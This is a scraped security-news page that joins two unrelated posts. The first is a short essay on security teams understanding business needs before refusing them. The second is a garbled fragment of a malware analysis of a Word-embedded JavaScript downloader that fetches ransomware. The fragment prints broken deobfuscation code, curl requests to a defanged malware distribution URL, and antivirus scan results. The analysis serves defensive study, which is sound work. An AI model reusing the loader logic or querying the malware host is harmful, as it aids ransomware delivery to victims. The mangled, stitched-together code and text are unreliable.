Information Security News |
A good friend told me that anengagedinformation security professional is one wholeads with the KNOW instead of the NO. This comment struck me and has resonated wellfor the lastseveral years. It hasencouraged me to better understand thedesires of the business areas in an attempt to avoid theperception of being the no police.
We are eachable to recognizethevalue in sprinklingin the information security concepts early and often into software development projects. This approach saves each of the stakeholders a great deal of time and frustration. Especially when compared tothe very opposite approach that often causes the information security team tolearn at the very last minute of a new high profile project that is about tolaunch without theproper level ofinformation security engagement.
There are certainly projects and initiatives that may very wellstill warrant a no from an information security perspective. Before we go there by default,I respectfully invite us all to KNOW before we NO.I truly believe that each of us can all improve the level of engagement with our respectivebusiness areas by considering this approach. In what areas can you KNOW before youNO next week?
Please leave what works in our comments section below.
Russell Eubanks
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.The Javascript is located in word/embeddings/oleObject1.bin. Once extracted and stored in %APPDATA%\Local\Temp\Order complete.js, it is executed and download a malicious PE file. Let try { c.open(deobfus(----uFuwwu,1), deobfus(----qqq:qLU:qjqtqqq:UtF_qF_,1)+?ff + loop, } var data = c.responseText.indexOf(||| padding:5px 10px"> hxxp://dev.watershowbranson.com/info.php?ffX
x being incremented by the loop.
When you try to access manually this URL, you get a different content depending on x padding:5px 10px"> $ curl hxxp://dev.watershowbranson.com/info.php?ff1 7,1,2,1,7,7,4,7,6,9,5,5,2|||1d6a11774069571211747695ffff7121b57476957121774709571217747695712177476957121774769571217747695...(removed) $ curl hxxp://dev.watershowbranson.com/info.php?ff2 7,2,4,0,2,8,4,8,0,1,8,2,3|||1d7a30284101872406848018ffff7240b08480187240284841872402848018724028480187240284801872402848018...(removed) $ curl hxxp://dev.watershowbranson.com/info.php?ff3 9,2,0,7,4,7,6,4,1,1,6,4,2|||3d7a97476711692078764116ffff9207b27641169207476451692074764116920747641169207476411692074764116...(removed)
Note the ||| var daddbdbfeed = ebcebafed } function deobfus(s,key){ var fcddcdfcfcfc = $d.JkT0_gOQ7F:%(*Z,[email protected])pbNhSGsloe5w var buffer = abcafefaddd if (cfbbadafdfabf0) { padding:5px 10px"> var foo = deobfus(----qqq:qLU:qjqtqqq:UtF_qF_ padding:5px 10px"> hxxp://dev.watershowbranson.com/info.php
Data returned by the HTTP request use another obfuscation technique. Data are passed to another function with the key being the array of integers (example as seen above: padding:5px 10px"> viper cab4.exe virustotal -v [+] VirusTotal Report for 5dc3d99293fe7b70a9796cf04492b954: [*] Detecting engines: +-------------------+--------------------------------------------+ | Antivirus | Signature | +-------------------+--------------------------------------------+ | Baidu | Win32.Trojan.WisdomEyes.16070401.9500.9999 | | CrowdStrike | malicious_confidence_100% (D) | | Cyren | W32/Spora.E.gen!Eldorado | | Endgame | malicious (high confidence) | | F-Prot | W32/Spora.E.gen!Eldorado | | Fortinet | W32/GenKryptik.ADNX!tr | | Invincea | virus.win32.sality.at | | McAfee | Ransomware-FMFE!5DC3D99293FE | | McAfee-GW-Edition | BehavesLike.Win32.Backdoor.fc | | Qihoo-360 | HEUR/QVM19.1.C414.Malware.Gen | | SentinelOne | static engine - malicious | | Sophos | Mal/Elenoocka-E | | Symantec | ML.Attribute.HighConfidence | +-------------------+--------------------------------------------+ [*] 13 out of 61 antivirus detected 5dc3d99293fe7b70a9796cf04492b954 as malicious. [*] https://www.virustotal.com/file/13e7a1f1291b0ddf1587d86b94989e0d8ff4884e3f2354810130a7865d0d431c/analysis/1493313215/
In this example, we have multiple payloads downloaded with their associated key (no direct PE file), we dont see XOR encryption or Base64 encoding. Nothingsuspicious, just plain text!
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key